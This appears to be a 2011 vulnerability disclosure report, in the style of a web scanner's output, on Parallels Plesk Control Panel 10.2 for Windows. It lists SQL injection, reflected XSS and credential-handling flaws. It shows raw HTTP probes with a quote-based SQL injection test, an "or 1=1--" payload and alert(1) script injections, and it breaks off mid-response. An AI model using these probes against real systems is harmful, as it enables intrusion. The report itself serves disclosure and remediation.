CVE-2011-4734, CVE-2011-4735, CVE-2011-4736, CVE-2011-4737, CVE-2011-4738, CVE-2011-4739, CVE-2011-4740, CVE-2011-4741, CVE-2011-4742, CVE-2011-4743, CVE-2011-4744, XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, Plesk Control Panel Version 20110407.20 for Windows

Report generated by XSS.CX at Tue May 24 05:40:53 CDT 2011 with respect to Plesk CPANEL for Windows Build 20110407.20 on Windows 2008 R2 Server, 64 Bit

Plesk SMB 10.2 for Windows Report of October 2010 | Plesk SMB 10.2 - Site Editor for Windows Report of October 2010

XSS.CX Summary

Parallels Plesk Control Panel Version 20110407.20 for Windows and the RHEL6 Linux versions are vulnerable to XSS and other injection vulnerabilities, reachable from a least-privileged user logged into the Control Panel. Various exploits are possible, from XSS to DoS. This report is specific to proving CWE-79 (XSS) as a user with the lowest level of authentication within the Control Panel application. Initially reported (privately) to Plesk in October 2010 in Parallels Ticket #1020740, these vulnerabilities, and others, still exist in the current releases of the Control Panel products. Further reported to CERT in April 2011 with Ticket VU#541814. No contact received after June 1, 2011. Published September 21, 2011 on XSS.CX.

Reflected XSS as Authenticated User in Plesk Control Panel Version 20110407.20.

XSS in Parallels Plesk Control Panel 10.2 for Windows, XSS, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86

Parallels Plesk Control Panel Version 20110407.20 for Windows, Application Crash, PleskBadURIException

Additionally, an exception has occurred while trying to report this error: PleskBadURIException
Parallels Plesk Control Panel Version 20110407.20 for Windows, CWE-79, CAPEC-86, Stored XSS PoC

Plesk Control Panel Version 20110407.20

Parallels Plesk Control Panel Version 20110407.20 for Windows, Application Crash

Plesk Control Panel Version 20110407.20

Immunity Debugger Screen Grab of W3P.EXE Program Termination, Call Stack, Registers, PHP5ts


1. SQL injection


1.1. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/ [no_frames_login_page cookie]

1.2. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/create-file/ [psaContext cookie]

1.3. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/edit/ [PLESKSESSID cookie]

1.4. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/view/ [certificateslist cookie]

1.5. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/%3Cscript%3Ealert(1)%3C/script%3E [name of an arbitrarily supplied request parameter]

1.6. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/%3Cscript%3Ealert(1)%3C/script%3E [no_frames_logout_page cookie]

1.7. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/script%3E [no_frames cookie]

2. Cross-site scripting (reflected)


2.1. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/custom-buttons/custom-button@new/properties/ [wizard parameter]

2.2. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/custom-buttons/custom-button@new/properties/ [wizard parameter]

2.3. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/backup/create/ [email parameter]

2.4. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/ [cmd parameter]

2.5. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/odbc/dsn@new/properties/ [wizard parameter]

2.6. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/app/download-progress/catalogId/marketplace/taskId/2 [REST URL parameter 7]

2.7. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/create [autoResponder%5BautoResponderSection%5D%5BcontentType%5D parameter]

2.8. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/edit/id/4 [autoResponder%5BautoResponderSection%5D%5BcontentType%5D parameter]

2.9. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/create [general%5Bvcard%5D%5Bemail%5D%5BemailType%5D parameter]

2.10. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/4 [general%5Bvcard%5D%5Bemail%5D%5BemailType%5D parameter]

3. Cleartext submission of password

3.1. http://vulnerable.plesk.control.panel.20110407.20:8880/login_up.php3

3.2. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/backup/ftp-repository/properties/

3.3. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/odbc/dsn@1/properties/

3.4. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/create

3.5. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/create/

3.6. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/edit/id/4

3.7. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/mail-list/create/

3.8. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/my-profile

3.9. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/create

3.10. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/create/

3.11. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/2

3.12. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/3

3.13. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/4

3.14. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/edit

4. Password returned in later response

5. Cookie without HttpOnly flag set

5.1. http://vulnerable.plesk.control.panel.20110407.20:8880/

5.2. http://vulnerable.plesk.control.panel.20110407.20:8880/javascript/chk.js.php

5.3. http://vulnerable.plesk.control.panel.20110407.20:8880/login_up.php3

5.4. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/create

5.5. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/fdf080d9f1bbdb1b327620b2

5.6. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/script%3E

5.7. http://vulnerable.plesk.control.panel.20110407.20:8880/get_password.php

5.8. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/backup/local-repository/

5.9. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/custom-buttons/

5.10. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/custom-buttons/custom-button@2/properties/

5.11. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/custom-buttons/custom-button@3/properties/

5.12. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/custom-buttons/custom-button@new/properties/

5.13. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/backup/create/

5.14. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/backup/ftp-repository/

5.15. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/backup/ftp-repository/properties/

5.16. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/backup/local-repository/

5.17. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/backup/schedule/

5.18. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/certificate@

5.19. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/dns/

5.20. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/domain-alias@

5.21. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/aspdotnet/

5.22. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/

5.23. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/create-file/

5.24. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/edit/

5.25. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/permissions/

5.26. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/rename/

5.27. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/view/

5.28. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/ftp-users/

5.29. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/hotlink-protection/

5.30. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/performance/

5.31. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/odbc/

5.32. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/odbc/dsn@1/properties/

5.33. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/odbc/dsn@new/properties/

5.34. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/traffic-hosting

5.35. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/shared-ssl/

5.36. http://vulnerable.plesk.control.panel.20110407.20:8880/spaw/spaw.php

6. Password field with autocomplete enabled

6.1. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/backup/ftp-repository/properties/

6.2. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/odbc/dsn@1/properties/

6.3. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/my-profile

6.4. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/create

6.5. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/create/

6.6. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/2

6.7. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/3

6.8. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/4

7. Cross-domain POST

8. Cross-domain Referer leakage

8.1. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/

8.2. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/rename/

8.3. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/app/search-data/catalogId/marketplace

8.4. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/fdf080d9f1bbdb1b327620b2

8.5. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/script%3E

9. File upload functionality

9.1. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/custom-buttons/custom-button@2/properties/

9.2. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/custom-buttons/custom-button@3/properties/

9.3. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/custom-buttons/custom-button@new/properties/

9.4. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/certificate@

9.5. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/create-file/

10. Database connection string disclosed

11. Email addresses disclosed

11.1. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/edit/id/1

11.2. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/edit/id/2

11.3. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/edit/id/4

11.4. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/list

11.5. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/list/

11.6. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/my-profile

11.7. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/create

11.8. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/2

11.9. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/3

11.10. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/4

11.11. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/list

11.12. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/list

11.13. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/list/

12. HTML does not specify charset

12.1. http://vulnerable.plesk.control.panel.20110407.20:8880/

12.2. http://vulnerable.plesk.control.panel.20110407.20:8880/javascript/chk.js.php

12.3. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/create-dir/

12.4. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/register-domain/

12.5. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/admin-home/featured-applications/

12.6. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/app/categories-data/catalogId/apscatalog

12.7. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/app/install/metaId/1

12.8. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/app/search-data/catalogId/marketplace

12.9. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/create

12.10. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/edit/id/2

12.11. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/edit/id/4

12.12. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/create

12.13. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/4

12.14. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/view

12.15. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/fdf080d9f1bbdb1b327620b2

12.16. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/script%3E

13. Content type incorrectly stated

13.1. http://vulnerable.plesk.control.panel.20110407.20:8880/javascript/chk.js.php

13.2. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/

13.3. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/admin-home/disable-featured-applications-promo

13.4. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/admin-home/featured-applications/

13.5. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/app/categories-data/catalogId/apscatalog

13.6. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/edit/id/2

13.7. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/4



1. SQL injection
There are 7 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/ [no_frames_login_page cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/hosting/file-manager/

Issue detail

The no_frames_login_page cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the no_frames_login_page cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /plesk/client@2/domain@1/hosting/file-manager/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; psaContext=dashboard; no_frames=deleted; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_login_page=deleted';

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:35:43 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:35:46 GMT
Connection: close
Content-Length: 1208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>500 - Internal server error.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>500 - Internal server error.</h2>
<h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3>
</fieldset></div>
</div>
</body>
</html>

Request 2

GET /plesk/client@2/domain@1/hosting/file-manager/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; psaContext=dashboard; no_frames=deleted; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_login_page=deleted'';

Response 2

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:35:47 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:35:49 GMT
Connection: close
Content-Length: 93511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot20541325%27%2520or%25201%253d1--%2520%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fftp-users%252F%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fweb-users%252F%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fanonymous-ftp%252F%2F' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>File Manager</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/filemanager/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/hosting-panel=web.view/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;


           function update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "update";
               lsubmit(f);

               return false;
           }

           function chmod_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "chmod";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function rename_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "rename";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function new_file_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_file";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-file/"
               lsubmit(f);

               return false;
           }

           function count_size_oC()
           {
               f = document.forms[0];
               f.cmd.value = "count_size";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function extract_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "extract";
               f.subcmd.value = "";
               lsubmit(f);
               return false;
           }

           function pack_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/pack/"
               lsubmit(f);

               return false;
           }

           function create_archive_oC() {
               f = document.forms[0];

               if ("" == f.archive_name.value) {
                   alert("Please enter file name.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "pack";
               lsubmit(f);

               return false;
           }

           function new_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_dir";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-dir/"
               lsubmit(f);

               return false;
           }

           function create_file_oC()
           {
               f = document.forms[0];
errorfield(f.new_file, false);

               if (f.create_file_method[0].checked) { // upload
                   f.cmd.value = "upload_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               if (f.create_file_method[1].checked) { // create
                   if (f.new_file.value == "") {
        errorfield(f.new_file, true);
                       alert("Some fields are empty or contain an improper value.");
                       f.new_file.focus();
                       return false;
                   }

                   f.cmd.value = "create_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               return false;
           }

           function create_file_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_file";
               f.subcmd.value = "save";
               lsubmit(f);

               return false;
           }

           function create_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_dir";
               f.file.value = f.new_dir.value;
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function edit_reset_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "";
               f.reset();
               return false;
           }

           function edit_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save";
               lsubmit(f);
               return false;
           }

           function edit_save_exit_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save_exit";
               lsubmit(f);
               return false;
           }

           function codepage_oC()
           {
               f = document.forms[0];
               f.subcmd.value = "codepage";
